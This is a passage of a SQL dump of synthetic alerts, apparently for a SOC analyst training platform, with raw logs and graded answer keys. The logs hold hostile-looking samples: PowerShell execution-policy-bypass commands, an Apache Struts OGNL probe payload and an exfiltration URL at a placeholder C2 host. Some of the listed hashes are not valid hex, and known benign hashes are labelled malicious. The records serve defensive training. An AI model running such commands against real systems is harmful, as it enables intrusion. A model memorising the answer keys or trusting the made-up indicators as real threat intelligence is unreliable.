account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(572, 'Deploying RAM-Scraping Malware', 'high', 'Endpoint detection and response (EDR) logs', 'The EDR system detected the deployment of a RAM-scraping malware on POS systems. The malware was installed to capture unencrypted credit card data during transactions. Indicators of compromise (IOCs) were identified, including a known malicious IP address and file hash associated with RAM-scraping activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"POS-Server-01\",\"username\":\"admin\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -exec bypass -file C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"file_hash\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"source_ip\":\"198.51.100.27\",\"destination_ip\":\"192.168.1.25\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous RAM-scraping malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as RAM-scraping malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts for RAM-scraping operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(573, 'Establishing Persistence', 'medium', 'Active Directory logs', 'An unauthorized user account was created in the Active Directory to maintain persistent access to the network. The account creation was detected, indicating a potential persistence technique being employed by attackers.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:15:30Z\",\"event_id\":\"4720\",\"event_source\":\"Security\",\"computer_name\":\"DC1.corporate.local\",\"user\":\"SYSTEM\",\"target_user\":{\"account_name\":\"unauthorized_admin\",\"account_domain\":\"corporate\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"logon_type\":\"3\",\"logon_process\":\"Advapi\",\"authentication_package\":\"Negotiate\"}', '2026-01-08 22:01:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"unauthorized_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized user account created to maintain persistence.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(574, 'Lateral Movement to Payment Network', 'high', 'Network traffic analysis', 'FIN7 has moved laterally within the network using compromised credentials to access the payment processing network. The movement was detected through unusual network activity and the presence of known malicious IP addresses and file hashes.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:27:45Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_dump.exe\",\"event\":\"lateral movement detected\",\"description\":\"User jdoe moved laterally from 10.0.2.15 to 192.168.1.10 using stolen credentials, connecting from the external IP 203.0.113.45. Detected file hash e99a18c428cb38d5f260853678922e03 associated with known malware.\"}', '2026-01-08 22:01:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"User credentials may have been compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by FIN7.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"credential_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with credential dumping tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(575, 'Data Exfiltration of Credit Card Information', 'high', 'Data Loss Prevention (DLP) logs', 'In the final stage, attackers exfiltrated credit card data via an unauthorized FTP transfer to an external IP address, preparing to monetize the information through underground channels.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:54Z\",\"event_id\":\"dlp-20231025-142354\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"21\",\"protocol\":\"FTP\",\"username\":\"compromised_user\",\"exfiltrated_files\":[\"credit_card_data.csv\"],\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"allowed\",\"alert\":\"Credit card data exfiltration detected\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external dns\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_card_data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive credit card information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated credit card data file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(576, 'Suspicious HTTP Request Detected', 'high', 'Web Server Logs', 'A crafted HTTP request aimed at exploiting the Apache Struts vulnerability was detected. This attack attempts to gain initial access to the server by exploiting CVE-2017-5638.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"GET\",\"url\":\"/struts2-showcase/index.action\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"payload\":\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\",\"response_code\":200,\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used for testing or malicious purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(577, 'Unusual Command Execution Observed', 'high', 'Application Logs', 'Post-exploitation activity detected. An attacker executed a series of suspicious commands to establish control over the server. The commands are indicative of an attempt to further compromise the system by downloading additional malicious payloads.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"log_source\":\"application_log\",\"event_type\":\"command_execution\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"command\":\"powershell -exec bypass -File C:\\\\Users\\\\Public\\\\malicious.ps1\",\"malicious_file\":\"C:\\\\Users\\\\Public\\\\malicious.ps1\",\"attacker_ip\":\"198.51.100.23\",\"hash\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"additional_info\":\"Command executed with elevated privileges\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(578, 'Web Shell Detected in Server Directory', 'high', 'File Integrity Monitoring', 'A web shell was detected in the server directory, indicating an attempt to maintain persistent access to the compromised system. The file integrity monitoring system flagged an unauthorized file upload, which was later identified as a web shell. The immediate threat involves potential unauthorized control over the server.', 'Persistence', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_type\":\"file_change\",\"host_ip\":\"192.168.1.10\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"webadmin\",\"source_ip\":\"203.0.113.45\",\"action\":\"upload\",\"status\":\"success\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a common web shell\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of known web shells\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(579, 'Unexpected Outbound Traffic Spike', 'high', 'Network Traffic Analysis', 'Detected a significant spike in outbound network traffic from internal systems to an external IP associated with known malicious activity. The data being exfiltrated includes sensitive files.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"port\":443,\"bytes_sent\":10485760,\"filename\":\"confidential_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"process\":\"data_exfil.exe\",\"url\":\"https://malicious-c2-server.com/upload\",\"indicator_type\":\"malware\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Policies\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation\",\"verdict\":\"malicious\",\"details\":\"URL linked to malicious C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(580, 'Unauthorized User Account Activity', 'high', 'User Authentication Logs', 'An attacker is using compromised credentials to move laterally across the network, attempting to access additional sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:12:55Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"target_domain\":\"INTERNALCORP\",\"target_username\":\"jdoe\",\"logon_guid\":\"{3E7EAB11-4C7A-4D7D-BB8D-ED7BE3AB1A8A}\",\"source_port\":\"52435\",\"status\":\"Success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"additional_info\":{\"filename\":\"compromised_document.docx\"}}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential credential compromise\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(581, 'Anomalous File Access Patterns', 'medium', 'File Access Logs', 'During routine monitoring, anomalous access patterns were detected on the file server. An external IP address was observed accessing multiple files containing sensitive information, potentially as a reconnaissance activity to identify valuable data for exfiltration.', 'Reconnaissance', 'T1592 - Gather Victim Host Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:37Z\",\"event_type\":\"file_access\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"file_accessed\":[\"/finance/2023_budgets.xlsx\",\"/hr/employee_records.docx\",\"/legal/contracts/nda.pdf\"],\"file_hash\":[\"5f4dcc3b5aa765d61d8327deb882cf99\",\"098f6bcd4621d373cade4e832627b4f6\",\"e99a18c428cb38d5f260853678922e03\"],\"access_method\":\"smb\",\"action\":\"read\"}', '2026-01-08 22:06:19', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known reconnaissance activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/finance/2023_budgets.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive financial document accessed\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/hr/employee_records.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive HR document accessed\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/legal/contracts/nda.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive legal document accessed\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(582, 'DNS Tunneling Suspected', 'high', 'DNS Query Logs', 'A DNS tunneling technique has been detected, indicating potential command and control activities. The attacker is using DNS queries to maintain communication with compromised systems.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"source_ip\":\"10.2.3.15\",\"destination_ip\":\"203.0.113.45\",\"queried_domain\":\"malicious.example.com\",\"dns_query_type\":\"TXT\",\"dns_response\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_host\":\"compromised-host.local\",\"username\":\"jdoe\",\"unique_transaction_id\":\"1234567890abcdef\",\"detected_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_filename\":\"dns_tunnel_tool.exe\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DNS Threat List\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DNS tunneling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DNS tunneling tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dns_tunnel_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"File detected as DNS tunneling executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(583, 'Encrypted Traffic Anomaly', 'high', 'SSL/TLS Traffic Inspection', 'Anomalous encrypted traffic was detected, indicating potential data exfiltration activities. The attacker is leveraging SSL/TLS channels to evade detection.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:45Z\",\"source_ip\":\"192.168.1.22\",\"destination_ip\":\"203.0.113.45\",\"ssl_subject\":\"CN=malicious-actor.com\",\"ssl_issuer\":\"CN=Let\'s Encrypt Authority X3\",\"data_volume\":\"5GB\",\"file_hash\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"filename\":\"encrypted_payload.bin\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"protocol\":\"TLSv1.2\",\"alert_id\":\"EXFIL-2023-0008\",\"user_agent\":\"curl/7.68.0\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected during traffic inspection.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User is registered and active within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(584, 'Privileged Account Escalation Attempt', 'high', 'Privilege Access Management Logs', 'An attempt was detected where an attacker tried to escalate privileges to access restricted areas of the network and sensitive data. This is an intermediate level attempt at privilege escalation.', 'Privilege Escalation', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":4625,\"event_type\":\"Audit Failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"username\":\"john_doe\",\"domain\":\"CORP\",\"logon_type\":10,\"status\":\"0xC000006A\",\"sub_status\":\"0xC0000064\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"attempted_action\":\"Privilege Escalation\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal machine targeted for privilege escalation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Existing user attempting unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(585, 'Detected Data Anomalies in Backup Systems', 'high', 'Backup System Logs', 'Anomalous data modification detected in backup systems, indicating potential tampering activity aimed at covering tracks post data exfiltration. Changes were made to the backup files shortly after unauthorized access was recorded. Observations indicate the presence of malicious IPs and altered backup files.', 'Impact', 'T1485 - Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:15:27Z\",\"event_id\":\"4672\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"username\":\"backup_admin\",\"action\":\"modify\",\"file_modified\":\"/backup/weekly-full/2023-10-14.bak\",\"hash_before\":\"5d41402abc4b2a76b9719d911017c592\",\"hash_after\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"anomalies_detected\":true,\"related_malware\":\"APT29\",\"severity\":\"high\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in backup operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/backup/weekly-full/2023-10-14.bak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Logs\",\"verdict\":\"suspicious\",\"details\":\"Backup file modified during unauthorized access 